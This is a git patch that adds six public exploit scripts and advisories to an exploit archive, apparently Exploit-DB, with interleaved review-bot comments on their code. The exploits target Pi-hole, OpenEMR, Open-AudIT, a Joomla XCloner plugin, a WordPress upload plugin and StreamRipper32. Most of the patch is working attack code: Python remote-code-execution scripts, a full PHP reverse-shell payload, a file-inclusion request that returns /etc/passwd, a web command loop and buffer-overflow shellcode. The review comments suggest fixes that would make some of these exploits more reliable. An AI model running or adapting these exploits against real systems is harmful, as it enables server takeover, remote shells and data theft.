From e031da05b03df0edb1b44fc7b6ae704b0c0b4b14 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 27 May 2020 05:02:09 +0000
Subject: [PATCH] DB: 2020-05-27

7 changes to exploits/shellcodes

StreamRipper32 2.6 - Buffer Overflow (PoC)
OpenEMR 5.0.1 - Remote Code Execution
Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)
Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)
Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
---
 exploits/linux/webapps/48519.py | 254 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/40300.py | 2 +-
 exploits/php/webapps/48515.py | 187 +++++++++++++++++++++++
 exploits/php/webapps/48516.txt | 12 ++
 exploits/php/webapps/48518.txt | 103 +++++++++++++
 exploits/php/webapps/48520.txt | 123 ++++++++++++++++
 exploits/windows/local/48517.py | 39 +++++
 files_exploits.csv | 6 +
 8 files changed, 725 insertions(+), 1 deletion(-)
 create mode 100755 exploits/linux/webapps/48519.py
 create mode 100755 exploits/php/webapps/48515.py
 create mode 100644 exploits/php/webapps/48516.txt
 create mode 100644 exploits/php/webapps/48518.txt
 create mode 100644 exploits/php/webapps/48520.txt
 create mode 100755 exploits/windows/local/48517.py
diff --git a/exploits/linux/webapps/48519.py b/exploits/linux/webapps/48519.py
new file mode 100755
index 000000000..b401230b1
--- /dev/null
+++ b/exploits/linux/webapps/48519.py
@@ -0,0 +1,254 @@
+# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
+# Date: 2020-05-22
+# Exploit Author: Photubias
+# Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE
+# Version: Pi-hole <=4.4.0 + Web <=4.3.3
+# Tested on: Pi-hole v4.4.0-g9e49077, Web v4.3.3,v4.3.2-1-g4f824be, FTL v5.0 (on Debian 10)
+# CVE: CVE-2020-11108
+
+#!/usr/bin/env python3
+'''
+ Copyright 2020 Photubias(c)
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see .
+
+ Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py
+
+ File name CVE-2020-11108.py
+ written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
+
+ ## Vulnerable setup instructions (from clean Debian 10-Buster):
+ > apt update && apt install -y curl
+ > curl -sSL https://install.pi-hole.net | bash
+ > pihole checkout web release/v4.3.3
+ > cd /etc/.pihole/ && git checkout v4.4
+ > pihole -r ## Select reconfigure
+
+ This is a native implementation without requirements, written in Python 3.
+ Works equally well on Windows as Linux (as MacOS, probably ;-) + + Features: + * Does a reliable check before exploitation (not based on version numbers) + * Performs normal RCE without Privilege Escalation (wich is more trust worthy) + * Asks before running Root RCE (as this overwrites certain files) + * Performs a cleanup in all cases (success / failure) +''' + +import urllib.request, ssl, http.cookiejar, sys, string, random +import socket, _thread, time + +## Default vars; change at will +_sURL = '192.168.50.130' +_sPASSWORD = '6DS4QtW5' +_iTIMEOUT = 5 +_sLOCALIP = '192.168.50.1' +_sFILENAME = 'fun2.php' +_sLOCALNCPORT = '4444' ## Make sure to set up a listener on this port first + +## Ignore unsigned certs +ssl._create_default_https_context = ssl._create_unverified_context + +## Keep track of cookies between requests +cj = http.cookiejar.CookieJar() +oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) + +def randomString(iStringLength=8): + sLetters = string.ascii_lowercase + return ''.join(random.choice(sLetters) for i in range(iStringLength)) + +def postData(sURL, lData, bEncode = True): + try: + if bEncode: oData = urllib.parse.urlencode(lData).encode() + else: oData = str(lData).encode() + oRequest = urllib.request.Request(url = sURL, data = oData) + return oOpener.open(oRequest, timeout = _iTIMEOUT) + except: + print('----- ERROR, site down?') + sys.exit(1) + +def getEndpoint(): + if not _sURL[:4].lower() == 'http': sURL = 'http://' + _sURL + else: sURL = _sURL + if not sURL[:-1] == '/': sURL += '/' + if not '/admin' in sURL: sURL += 'admin' + try: + oRequest = urllib.request.Request(sURL) + oResponse = oOpener.open(oRequest, timeout = _iTIMEOUT) + except: + print('[-] Error: ' + sURL + ' not responding') + exit(1) + if oResponse.code == 200: + print('[+] Vulnerable URL is ' + sURL) + return sURL + else: + print('[-] Error: ' + sURL + ' does not exist?') + exit(1) + +def startListener(sPayload, iSockTimeout): + ## Listener must 
always be on port 80, does not work otherwise + oSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + print('[!] Binding to '+_sLOCALIP+':80') + oSock.bind((_sLOCALIP,80)) + oSock.settimeout(iSockTimeout) + oSock.listen() + + while True: + try: oConn,sAddr= oSock.accept() + except: break + print('[+] Yes, we have an incoming connection from '+str(sAddr[0])) + oConn.sendall(sPayload.encode()) + oConn.close() + break + oSock.close() + print('[!] Closing Listener') + +def doLogin(sURL, sPassword): + sPath = '/index.php?login' + lData = {'pw':sPassword} + oResponse = postData(sURL + sPath, lData) + sResult = oResponse.read().decode(errors='ignore') + if 'Wrong password' in sResult: + print('Wrong password') + sys.exit(1) + return True + +def getToken(sURL): + sPath = '/settings.php?tab=blocklists' + oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) + sResult = oResponse.read().decode(errors='ignore') + if 'id=\'token\'' in sResult: + return sResult.split('id=\'token\' hidden>')[1].split('<')[0] + else: + print('[-] Error in getting a token') + sys.exit(1) + +def createBackdoor(sURL, sFilename): + sToken = getToken(sURL) + sPath = '/settings.php?tab=blocklists' + lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o ' + sFilename + ' -d "', 'field':'adlists', 'token':sToken, 'submit':'save'} + #lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o fun.php -d "', 'field':'adlists', 'token':sToken, 'submit':'saveupdate'} + oResponse = postData(sURL + sPath, lData) + if oResponse.code == 200: + sResult = oResponse.read().decode(errors='ignore') + arrBlocklists = sResult.split('target="_new"') + sID = str(len(arrBlocklists)-2) + print('[+] Creation success, ID is '+sID+'!') + return sID + else: + return '' + + +def doUpdate(sURL): + sPath = '/scripts/pi-hole/php/gravity.sh.php' + try: + oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) + if oResponse.code == 200: print('[+] Update succeeded.') + 
return True + except: + print('[-] Error; callback failed, maybe a firewall issue?') + return False + +def callExploit(sURL, sFilename = _sFILENAME): + sPath = '/scripts/pi-hole/php/' + sFilename + print('[+] Calling ' + sURL + sPath) + try: + oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) + if oResponse.code == 200: print('[+] Calling exploit succeeded.') + print(oResponse.read().decode(errors='ignore')) + except: + pass + +def removeEntry(sURL, sID): + print('[+] Cleaning up now.') + sToken = getToken(sURL) + sPath = '/settings.php?tab=blocklists' + lData = {'adlist-del-'+sID:'on', 'newuserlists':'', 'field':'adlists', 'token':sToken, 'submit':'save'} + oResponse = postData(sURL + sPath, lData) + if oResponse.code == 200: + print('[+] Remove success') + +def main(): + global _sURL, _sPASSWORD, _iTIMEOUT, _sLOCALIP, _sFILENAME, _sLOCALNCPORT + if len(sys.argv) == 1: + print('[!] No arguments found: python3 CVE-2020-11108.py ') + print(' Example: ./CVE-2020-11108.py 192.168.50.130 192.168.50.1 6DS4QtW5') + print(' But for now, I will ask questions') + sAnswer = input('[?] Please enter the IP address for Pi-Hole ([' + _sURL + ']): ') + if not sAnswer == '': _sURL = sAnswer + sAnswer = input('[?] Please enter the your (reachable) IP address to launch listeners ([' + _sLOCALIP + ']): ') + if not sAnswer == '': _sLOCALIP = sAnswer + sAnswer = input('[?] 
Please enter the password for Pi-Hole ([' + _sPASSWORD + ']): ') + if not sAnswer == '': _sPASSWORD = sAnswer + else: + _sURL = sys.argv[1] + _sLOCALIP = sys.argv[2] + _sPASSWORD = sys.argv[3] + + ## MAIN + sURL = getEndpoint() ## Will also set the initial SessionID + doLogin(sURL, _sPASSWORD) + + ## Creating backdoor (1) ## the old 'fun.php' + sFilename = randomString() + '.php' + sID = createBackdoor(sURL, sFilename) + + ## Launch first payload listener and send 200 OK + _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,)) + if doUpdate(sURL): + print('[+] This system is vulnerable!') + + ## Question Time + sAnswer = input('Want to continue with exploitation? (Or just run cleanup)? [y/N]: ') + if not sAnswer.lower() == 'y': + removeEntry(sURL, sID) + sys.exit(0) + sAnswer = input('Want root access? (Breaks the application!!) [y/N]: ') + if sAnswer.lower() == 'y': bRoot = True + else: bRoot = False + + if bRoot: + print('[!] Allright, going for the root shell') + ## Launch payload listener and send root shell + _sPayload = '''''' + _thread.start_new_thread(startListener,(_sPayload,5,)) + doUpdate(sURL) + + ## Creating backdoor (2), overwriting teleporter.php + sID2 = createBackdoor(sURL, 'teleporter.php') + + ## Launch payload listener for a new 200 OK + _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,)) + doUpdate(sURL) + + input('Ok, make sure to have a netcat listener on "' + _sLOCALIP + ':' + _sLOCALNCPORT + '" ("nc -lnvp ' + _sLOCALNCPORT + '") and press enter to continue...') + + ## Launch shell payload listener: + _sPayload = ''' + ''' %(_sLOCALIP, _sLOCALNCPORT) + #_sPayload = '''''' ## this works perfectly, but the URL is authenticated + _thread.start_new_thread(startListener,(_sPayload,5,)) + doUpdate(sURL) + + ## Launching the payload, will create new PHP file + callExploit(sURL, sFilename) + + ## Remove entry again + if bRoot: removeEntry(sURL, sID2) + removeEntry(sURL, sID) + + if 
len(sys.argv) == 1: input('[+] All done, press enter to exit') + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/40300.py b/exploits/php/webapps/40300.py index 2b3904dca..9997cd4cc 100755 --- a/exploits/php/webapps/40300.py +++ b/exploits/php/webapps/40300.py @@ -122,4 +122,4 @@ for x in range(0, 300): sys.exit(0) print "Sorry, I did not find anything" -''' +''' \ No newline at end of file diff --git a/exploits/php/webapps/48515.py b/exploits/php/webapps/48515.py new file mode 100755 index 000000000..7725a1173 --- /dev/null +++ b/exploits/php/webapps/48515.py 
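Review bot: The trailing-slash test in getEndpoint is wrong — `if not sURL[:-1] == '/': sURL += '/'` compares everything except the last character with `'/'`, so it is effectively always true and a slash is appended even when the caller already supplied one, yielding `.../admin//index.php?login` for an input ending in `/admin/`; it should read `if not sURL.endswith('/'): sURL += '/'`. The bare `except:` clauses in postData, getEndpoint and callExploit swallow every exception (including KeyboardInterrupt) and replace the real error with "site down?", so a failed run cannot be diagnosed; `except (OSError, ValueError) as e:` followed by printing `e` keeps the same exit behaviour while showing the cause. The adlist ID used for cleanup is inferred by counting `target="_new"` anchors in the settings page (`sID = str(len(arrBlocklists)-2)`), so on a Pi-hole whose blocklist page renders differently from the author's, removeEntry would presumably delete a different, legitimate adlist entry — worth a comment, since this script is meant to be run against other people's installations. `ssl._create_default_https_context = ssl._create_unverified_context` disables certificate verification process-wide, which is acceptable for a lab PoC but deserves a comment so the module is not lifted into a tool that talks to real hosts. The PHP payloads assigned to `_sPayload` are empty in this rendering, presumably stripped as markup, so the root-shell and reverse-shell stages could not be reviewed here.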
@@ -0,0 +1,187 @@ +# Title: OpenEMR 5.0.1 - Remote Code Execution +# Exploit Author: Musyoka Ian +# Date: 2020-05-25 +# Title: OpenEMR < 5.0.1 - Remote Code Execution +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz +# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile +# Version: < 5.0.1 (Patch 4) +# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 +# References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69 + +# openemr_exploit.py + +#!/usr/bin/env python2 +# -*- coding: utf-8 -*- + +import requests +import time + +auth = "[+] Authentication with credentials provided please be patient" +upload = "[+] Uploading a payload it will take a minute" +netcat = "[+] You should be getting a shell" +s = requests.Session() +payload = {'site': 'default', 'mode' : 'save', 'docid' : 'shell.php', 'content' : """ array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is 
available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); + +// Like print, but does nothing if we've daemonised ourself +// (I can't figure out how to redirect STDOUT like a proper daemon) +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?> """} +print (auth) +url = "http://localhost/openemr/interface/main/main_screen.php?auth=login&site=default" +data= { + 'new_login_session_management' : '1', + 'authProvider' : 'Default', + 'authUser' : 'admin', # change this to the the appropriate username + 'clearPass' : 'password123', # change this to the appropriate password + 'languageChoice' : '1', + } + +response = s.post(url, data=data,).text +time.sleep(2) +print (upload) +time.sleep(2) +resp = s.post("http://localhost/openemr/portal/import_template.php?site=default", data = payload) +time.sleep(2) +print (netcat) +rev_shell = s.get("http://localhost/openemr/portal/shell.php") +print (rev_shell.text) \ No newline at end of file 
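Review bot: Neither the login nor the upload response is inspected — `response = s.post(url, data=data,).text` is assigned and never read, and `resp` from the import_template POST is likewise ignored — so a wrong password or a rejected write still prints "You should be getting a shell" and the final GET to shell.php simply returns whatever the portal serves for a missing file. At minimum call `resp.raise_for_status()` on the upload and abort when the login response still contains the login form (the `authUser` field reappearing is a plausible failure marker, but confirm against a real instance); the `time.sleep(2)` calls pace the output without verifying anything. The target URL, username and password are hard-coded to `http://localhost/openemr/` and `admin`/`password123`, unlike the other PoCs in this batch which take them from `sys.argv` or prompts; taking them as arguments would make the script usable without editing. The opening of the PHP payload (the `<?php` tag and the `$ip`/`$port`/socket setup) is missing in this rendering, presumably stripped as markup, so the listener address could not be checked here.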
diff --git a/exploits/php/webapps/48516.txt b/exploits/php/webapps/48516.txt
new file mode 100644
index 000000000..166566f0c
--- /dev/null
+++ b/exploits/php/webapps/48516.txt
@@ -0,0 +1,12 @@
+# Exploit Title: Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)
+# Date: 2020-04-26
+# Exploit Author: Kamaljeet Kumar
+# Vendor Homepage: https://opmantek.com/network-discovery-inventory-software/
+# Software Link: https://www.open-audit.org/downloads.php
+# Version: 3.3.0
+# CVE : CVE-2020-12261
+# POC:
+Step 1: Login to Open-Audit
+Step 2: Go to "http://192.168.0.4/open-audit/index.php/search/" and add this "" payload after the search, the URL look like: http://192.168.0.4/open-audit/index.php/search/
+
+Then we get the XSS pop up.
\ No newline at end of file
diff --git a/exploits/php/webapps/48518.txt b/exploits/php/webapps/48518.txt
new file mode 100644
index 000000000..5a34b9c79
--- /dev/null
+++ b/exploits/php/webapps/48518.txt
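Review bot: The payload in Step 2 is empty in this rendering (`add this "" payload`) and the example URL still ends at `/search/` with nothing appended, so the advisory as shown cannot be reproduced; presumably the script tag was stripped as markup. Stating the payload URL-encoded (the final URL exactly as it appears in the address bar) and naming the path segment or parameter that is reflected would let the PoC survive rendering and let a reader confirm the reflection point. A short excerpt of the HTTP response showing the unencoded reflection, as the XCloner advisory in this batch does with its request/response pair, would support the claim better than "we get the XSS pop up".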
@@ -0,0 +1,103 @@
+# Exploit Title: Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)
+# Date: 2020-05-10
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Exploit-Db Author ID: 8763
+# Reference: https://www.xcloner.com/xcloner-news/security-release-available-for-archived-joomla-version/
+# Vendor Homepage: http://www.xcloner.com
+# Software Link: https://www.xcloner.com/support/download/
+# Version: 3.5.3
+# Tested on: Kali Linux - Apache2
+--------------------------------------------------------------------------------
+Detail:
+--------------------------------------------------------------------------------
+File: administrator/components/com_xcloner-backupandstore/admin.cloner.php -->
+------------
+case 'download':
+ downloadBackup($_REQUEST['file']);
+ break;
+-------------
+downloadBackup function's file -> administrator/components/com_xcloner-backupandstore/cloner.functions.php
+Vulnerable parameter: file
+
+downloadBackup function's definition
+--------------------------------------------------------------------------------
+ function downloadBackup($file)
+ {
+ global $_CONFIG;
+
+ $file = realpath($_CONFIG['clonerPath'] . "/$file");
+
+ //First, see if the file exists
+ if (!is_file($file)) {
+ die("404 File $file was not found!");
+ }
+
+ //File Info
+ $len = get_filesize($file);
+ $filename = basename($file);
+ $file_extension = strtolower(substr(strrchr($filename, "."), 1));
+
+ //Setam Content-Type-urile pentru fisierul in cauza
+ switch ($file_extension) {
+ default:
+ $ctype = "application/force-download";
+ }
+
+ smartReadFile($file, $filename);
+
+ exit;
+ }
+--------------------------------------------------------------------------------
+and smartReadFile function's definition
+--------------------------------------------------------------------------------
+function smartReadFile($location, $filename, $mimeType='application/octet-stream')
+{ if(!file_exists($location))
+ { header ("HTTP/1.0 404 Not Found");
+ return;
+ }
+
+ $size=filesize($location);
+ $time=date('r',filemtime($location));
+
+ $fm=@fopen($location,'r');
+.
+.
+.
+--------------------------------------------------------------------------------
+PoC:
+Request:
+--------------------------------------------------------------------------------
+GET /joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=download&file=../../../../../../../../etc/passwd HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=view
+Connection: close
+Cookie: COOKIES
+Upgrade-Insecure-Requests: 1
+--------------------------------------------------------------------------------
+Response:
+--------------------------------------------------------------------------------
+HTTP/1.0 200 OK
+Date: Sun, 10 May 2020 18:12:04 GMT
+Server: Apache/2.4.41 (Debian)
+Cache-Control: public, must-revalidate, max-age=0
+Pragma: no-cache
+Accept-Ranges: bytes
+Content-Length: 3347
+Content-Range: bytes 0-3347/3347
+Content-Disposition: inline; filename=passwd
+Content-Transfer-Encoding: binary
+Last-Modified: Sun, 22 Mar 2020 05:41:35 -0700
+Connection: close
+Content-Type: application/octet-stream
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+.
+.
\ No newline at end of file
diff --git a/exploits/php/webapps/48520.txt b/exploits/php/webapps/48520.txt
new file mode 100644
index 000000000..5cba6e6af
--- /dev/null
+++ b/exploits/php/webapps/48520.txt
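Review bot: The root cause shown is that `realpath($_CONFIG['clonerPath'] . "/$file")` normalises the `../` sequences but the result is never compared with the backup directory, so any file readable by the web server is served; since the vendor reference only announces that a security release exists, the advisory should name the fix, e.g. `$base = realpath($_CONFIG['clonerPath']); if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) die("404 File was not found!");` (or restricting the parameter to `basename()`), and note that the `die()` message echoes the resolved path, which is itself an information leak. The component name is inconsistent: the file paths say `com_xcloner-backupandstore` while the request uses `option=com_xcloner-backupandrestore`; one of the two is presumably a typo, and since the request line is what a reader will copy it should be verified. The PoC needs an authenticated Joomla administrator session (`/administrator/` plus `Cookie: COOKIES`), which the title reflects but the Detail section never states — one sentence on the required privilege level belongs next to "Vulnerable parameter: file".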
@@ -0,0 +1,123 @@ +# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution +# Date: 2020-05-11 +# Exploit Author: Austin Martin +# Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/ +# Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/ +# Vendor Homepage: https://www.codedropz.com/ +# Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/ +# Version: 1.3.3.2 +# Tested on: WordPress 5.4.1, PHP 7.41 +# CVE : N/A + +# Notes: +# At time of disclosure, the WordPress page listed this plugin being used by +10,000 applications +# Application was patched by vendor within 24 hours of initial disclosure +# This exploit works bypassing the allowed file types and file type sanitization. If lucky, a PHP file with a reverse shell can be uploaded and accessed + +# Any file types can be added to the "supported_type" parameter +# These uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/ +# Dangerous file types such as php have "_.txt" appended to the end creating a text file +# This can be bypassed by adding '%' to the end of the allowed file type, and the end of the file name +# ex. 
"php%" for file type and "shell.php%" for filename +# The PHP payload in the POC can be easily modified to gain a reverse shell + +#!/usr/bin/python +import string +import random +import requests +from bs4 import BeautifulSoup +import sys + +payloadurl="" +def RecurseLinks(base,file): + + headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"} + f = requests.get(base, headers=headers) + soup = BeautifulSoup(f.content, "html.parser") + + for root in soup.find_all("a"): + href = root.get("href") + if (href.startswith("/")): + do = "nothing" + elif (href.endswith("/")): + RecurseLinks(base + href, file) + else: + if file in href: + print ("\n[+] File Found --> " + base + href) + global payloadurl + payloadurl = (base+href) + +def main(): + #os.system('cls') + print("WordPress Plugin \'Drag and Drop Multiple File Upload - Contact Form 7\' 1.3.3.2 - Unauthenticated Remote Code Execution") + print("@amartinsec --> Twitter\nCVE:2020-12800\n") + + #Build The Request + #Generate random URL for filename + file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6)) + + urlinput = raw_input("[+] Enter url to the vulnerable WordPress application: ") + + #Finding the nonce used in the Ajax security string + print ("\n[+] Searching for security string nonce") + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} + homepage = requests.get(urlinput,headers=headers) + homepage = homepage.text + homepage = homepage.split("ajax_nonce\":\"",1)[1] + securitykey = homepage[:10] + print("[+] Found security string --> " + securitykey) + + url = urlinput + "/wp-admin/admin-ajax.php" + + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", + "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", 
"X-Requested-With": "XMLHttpRequest", + "Content-Type": "multipart/form-data; boundary=---------------------------350278735926454076983690555601", + } + data = "-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n" \ + "php%\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n" \ + "5242880\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n" \ + "dnd_codedropz_upload\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"type" \ + "\"\r\n\r\nclick\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"security\"\r" \ + "\n\r\n" + securitykey +"\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"upload-file\"; " \ + "filename=\"" + file +".php%\"\r\nContent-Type: text/plain\r\n\r\n" \ + "&1'); ?>" \ + "\r\n-----------------------------350278735926454076983690555601--\r\n" + + print "\n[+] Sending payload to target" + + response = requests.post(url, headers=headers, data=data) + + if "200" in str(response): + print("[+] Looks like a successful file upload!\n") + + + elif "403" in str(response): + print("\nFile Upload Failed") + print("403 in response. Check security string") + sys.exit(1) + + else: + print("File upload failed. Try the manual way with Burp") + sys.exit(1) + + print("[+] Crawling for the uploaded file. 
This may take a minute...") + print("[+] Searching for " + file + ".php") + + RecurseLinks(urlinput + "/wp-content/uploads/",file) + + if payloadurl == "": + print("Can't find the file on the web server") + print("Try the manual method") + sys.exit(1) + + #If all goes well, we can now send requests for RCE + print("[+] Success\n") + while True: + cmd= raw_input("[+] CMD: ") + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} + request = requests.get(payloadurl + "?e=" + cmd, headers=headers) + print request.text + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/48517.py b/exploits/windows/local/48517.py new file mode 100755 index 000000000..44f781bec --- /dev/null +++ b/exploits/windows/local/48517.py 
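Review bot: The upload result is tested with `if "200" in str(response)` / `elif "403" in str(response)`, which string-matches the repr `<Response [200]>` rather than the status code; `response.status_code == 200` is the intended check and cannot be fooled by other codes or by digits in the URL. The command loop sends `payloadurl + "?e=" + cmd` unencoded, so any command containing a space, `&`, `#` or `%` is mangled or truncated before it reaches `system()`; `requests.get(payloadurl, params={"e": cmd}, headers=headers)` encodes it correctly. `homepage.split("ajax_nonce\":\"",1)[1]` raises IndexError when the plugin markup is absent from the page given, and `root.get("href")` returns `None` for anchors without an href, which then crashes `.startswith`; both should be reported as "plugin/listing not found" rather than a traceback, and the header notes should say that the crawl step relies on directory listing being enabled under `wp-content/uploads/` (which the Google dork already implies). `bs4` is a third-party dependency not mentioned in the header, and `raw_input` / `print request.text` pin the script to Python 2 despite the `print(...)` calls elsewhere.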
@@ -0,0 +1,39 @@
+# Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC)
+# Date: 2020-05-14
+# Exploit Author: Andy Bowden
+# Tested On: Win10 x64
+# Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
+# Vendor Page: http://streamripper.sourceforge.net/
+# Version: 2.6
+# Steps To Reproduce: Double click on "Add" in the"Station/Song Section" and paste the output in "SongPattern"
+
+#Bad Characters \x00\x0A\x0D
+file = open('exploit.txt', 'wb')
+
+buf = b""
+buf += b"A" * 256
+buf += b"\x47\x23\x30\x74" #74302347
+buf += b"\x90" * 30
+
+#calc payload
+buf += b"\xdb\xc2\xbd\x72\x07\xda\xa7\xd9\x74\x24\xf4\x58\x29"
+buf += b"\xc9\xb1\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x66\xe5"
+buf += b"\x2f\x5b\x6e\x6b\xcf\xa4\x6e\x0c\x59\x41\x5f\x0c\x3d"
+buf += b"\x01\xcf\xbc\x35\x47\xe3\x37\x1b\x7c\x70\x35\xb4\x73"
+buf += b"\x31\xf0\xe2\xba\xc2\xa9\xd7\xdd\x40\xb0\x0b\x3e\x79"
+buf += b"\x7b\x5e\x3f\xbe\x66\x93\x6d\x17\xec\x06\x82\x1c\xb8"
+buf += b"\x9a\x29\x6e\x2c\x9b\xce\x26\x4f\x8a\x40\x3d\x16\x0c"
+buf += b"\x62\x92\x22\x05\x7c\xf7\x0f\xdf\xf7\xc3\xe4\xde\xd1"
+buf += b"\x1a\x04\x4c\x1c\x93\xf7\x8c\x58\x13\xe8\xfa\x90\x60"
+buf += b"\x95\xfc\x66\x1b\x41\x88\x7c\xbb\x02\x2a\x59\x3a\xc6"
+buf += b"\xad\x2a\x30\xa3\xba\x75\x54\x32\x6e\x0e\x60\xbf\x91"
+buf += b"\xc1\xe1\xfb\xb5\xc5\xaa\x58\xd7\x5c\x16\x0e\xe8\xbf"
+buf += b"\xf9\xef\x4c\xcb\x17\xfb\xfc\x96\x7d\xfa\x73\xad\x33"
+buf += b"\xfc\x8b\xae\x63\x95\xba\x25\xec\xe2\x42\xec\x49\x1c"
+buf += b"\x09\xad\xfb\xb5\xd4\x27\xbe\xdb\xe6\x9d\xfc\xe5\x64"
+buf += b"\x14\x7c\x12\x74\x5d\x79\x5e\x32\x8d\xf3\xcf\xd7\xb1"
+buf += b"\xa0\xf0\xfd\xd1\x27\x63\x9d\x3b\xc2\x03\x04\x44"
+buf += b"\x90" * (1000 - len(buf))
+
+file.write(buf)
+file.close()
\ No newline at end of file
